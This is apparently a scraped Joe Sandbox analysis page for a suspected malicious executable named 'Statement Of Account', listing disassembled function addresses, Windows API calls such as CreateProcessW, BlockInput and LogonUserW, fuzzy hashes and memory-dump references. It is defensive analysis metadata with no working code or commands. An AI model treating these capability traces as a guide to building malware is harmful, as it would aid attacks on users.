Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 265d7a19d3eba539260361cc1fe5a3e70b302e1c8fb97200548962176bc833fd
Instruction ID: 470e8fa0199c65dedc5e4648daea85b25893cba94944c51086ff1a152fa8b7f9
Opcode Fuzzy Hash: 265d7a19d3eba539260361cc1fe5a3e70b302e1c8fb97200548962176bc833fd
Instruction Fuzzy Hash: 0EF082712543416BF324E764DC49FBBB3A8EF84715F008E2EF155960E1D7B4A848C76A

Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

0vH, xrefs: 0047CFD9
HH, xrefs: 0047CF38

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: 0vH$HH
API String ID: 0-728391547
Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A

Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040FF34

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794

Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,?,?,?,004A83D8,?), ref: 0047E22C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179

Function 00454C69 Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?,004A83D8,?), ref: 00454D46

Part of subcall function 0044A37A: GetForegroundWindow.USER32(?,?,00454CBD,004A83D8,000000FC,00000000,?,?,004A83D8,?), ref: 0044A37C
Part of subcall function 0044A37A: GetFocus.USER32 ref: 0044A384
Part of subcall function 0044A37A: SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogFocusForegroundMessageNtdllProc_SendWindow
String ID:
API String ID: 3709282597-0
Opcode ID: 38e5b937cba7a8922a2e949dccea1575aba6194ef8ab83a07684414c46f4c513
Instruction ID: a6609401f9500212a734e1352de4f41152f1c619293fb73b243e796064327410
Opcode Fuzzy Hash: 38e5b937cba7a8922a2e949dccea1575aba6194ef8ab83a07684414c46f4c513
Instruction Fuzzy Hash: 4421543020831565F6205258CC06F7B2668CBD2F2AF340A2FFC10A92D7C9EC6CDC922E

Function 00440ADF Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,004A83D8,?), ref: 00440B2E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 0350c70204df7ca237879bf3e5fe06d0c1427b15f4b1adfefff728055112d21b
Instruction ID: 2f89758668ff77fbe337a6258bca86c2c54edd6c60dd2fee594f13a620ab578e
Opcode Fuzzy Hash: 0350c70204df7ca237879bf3e5fe06d0c1427b15f4b1adfefff728055112d21b
Instruction Fuzzy Hash: 14F0E9716002119BE210CF04D80092B7BB5EBCA725F10851EF95157291C774AC52C7F9

Function 0044099C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,00000028), ref: 004409D5

Part of subcall function 00433FA4: _memset.LIBCMT ref: 00433FAD
Part of subcall function 00433FA4: _memset.LIBCMT ref: 00433FBB
Part of subcall function 00433FA4: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004A9300,004A92EC), ref: 00433FFF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _memset$CreateDialogNtdllProc_Process
String ID:
API String ID: 2209168074-0
Opcode ID: e47f80020b222bd5a26384a14466514d1d96ec9df3e7169497835d57343bbae6
Instruction ID: c9e79bee830d5b1130f852bdf2201be18db1474156fe398ae3ca2d8ebb21299f
Opcode Fuzzy Hash: e47f80020b222bd5a26384a14466514d1d96ec9df3e7169497835d57343bbae6
Instruction Fuzzy Hash: 7DE039B5608210AFD600EF44E990C9BB3A8EFCD314F01880DF98197256C734ED51CB65

Function 00454C1B Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00454C5F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 4a9068e34db6673d47e394aa80019476632bd9475fd7ea27e6bfec8fc14f2c8f
Instruction ID: 0c4b3b86ab389f7a39b655bf95fc8aee58d6d74e14bbd2e4030a53327a1dd945
Opcode Fuzzy Hash: 4a9068e34db6673d47e394aa80019476632bd9475fd7ea27e6bfec8fc14f2c8f
Instruction Fuzzy Hash: 7EF03074248310AFE210DB54DC49F97B7A4DBC9715F20494DB859572D18AB46C44CB65

Function 0044782B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,0000031A,?,?,?), ref: 00447863

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 18858d74dfa023294b40976d9944400fc0d5ac482db733d0de99421c67fed763
Instruction ID: 42e261f6b1c5cc74ba357aecf8ff1bc27c413e858a44b620ffcb460ef2ec5e49
Opcode Fuzzy Hash: 18858d74dfa023294b40976d9944400fc0d5ac482db733d0de99421c67fed763
Instruction Fuzzy Hash: E1E012B5915310AFD700EF64AD559AFB7E8EFD8710F008C2EF84593241D634A9048BA6

Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0045A272

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66

Function 0043323E Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?), ref: 00433274

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 8985a75d1e5520d2e499eec1a241bc42e0f4e5500bc870e04c8b1cc553ee22c2
Instruction ID: a483c428637070b8e8b58b13542464783085a457216f3b91bd99041a21057448
Opcode Fuzzy Hash: 8985a75d1e5520d2e499eec1a241bc42e0f4e5500bc870e04c8b1cc553ee22c2
Instruction Fuzzy Hash: C6E0EC71108230A6F2115B1D9C09FEFB798EB95711F00891AF595D50D1D7A89981C7A9

Function 00447B15 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,004A83D8,?), ref: 00447B44

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 0cfbf2acc00addbbb112fedb16ead420504d194982c0b609c4a8b51bc51d211d
Instruction ID: 287779551a3d337ef591f2aa8d6aea7dae02fb3ffa9334f78727036f59ac8bdc
Opcode Fuzzy Hash: 0cfbf2acc00addbbb112fedb16ead420504d194982c0b609c4a8b51bc51d211d
Instruction Fuzzy Hash: 1EE08C75341210FFD610EB44CC45EABB768EFCA710F20884DB6409B291CAB5B882CBA9

Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32

Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 004711E4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB

Function 0046F749 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0046EA7F: DestroyAcceleratorTable.USER32(?), ref: 0046EA9F

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,004A83D8,?), ref: 0046F766

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AcceleratorDestroyDialogNtdllProc_Table
String ID:
API String ID: 2638641937-0
Opcode ID: 06952883360e1e391e59db4eaed395cda2773b78a7793c669c636c8e584b7d12
Instruction ID: 06d0bebe78a134197a7dbf98cf3f66dff11b544ea33b26a74c1067ac85f7c233
Opcode Fuzzy Hash: 06952883360e1e391e59db4eaed395cda2773b78a7793c669c636c8e584b7d12
Instruction Fuzzy Hash: 6AC0127528132071D42072655C0BFCF65589F95B10F10880EB704760D145F8684046AE

Function 0044096A Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000211), ref: 00440993

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 41a03df81dd0099e64b80ded503388aed7d4d67559f9716f09430e6844efc855
Instruction ID: 407f05fc3492abb5fd49a85034767b6ec1f65670c295c667e1fd20220c9b2f04
Opcode Fuzzy Hash: 41a03df81dd0099e64b80ded503388aed7d4d67559f9716f09430e6844efc855
Instruction Fuzzy Hash: A4E0BD78204241AFC700DF04C8A8E5AB7A5EB89300F05885CF695873A1C7B0A810CB61

Function 00440938 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000212), ref: 00440961

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 9007b3aeaa96a9216af1aa891557632efc81bced1778891bc28c6ea784fb7703
Instruction ID: 61be733c19743c94c30739cd10f0c63b75a633f5031b8889380e421685ee7e99
Opcode Fuzzy Hash: 9007b3aeaa96a9216af1aa891557632efc81bced1778891bc28c6ea784fb7703
Instruction Fuzzy Hash: 75E0BD78204241AFC300DF04C9A8E5AB7A5EB89300F05885CFA95873A6C7B0A814CB21

Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
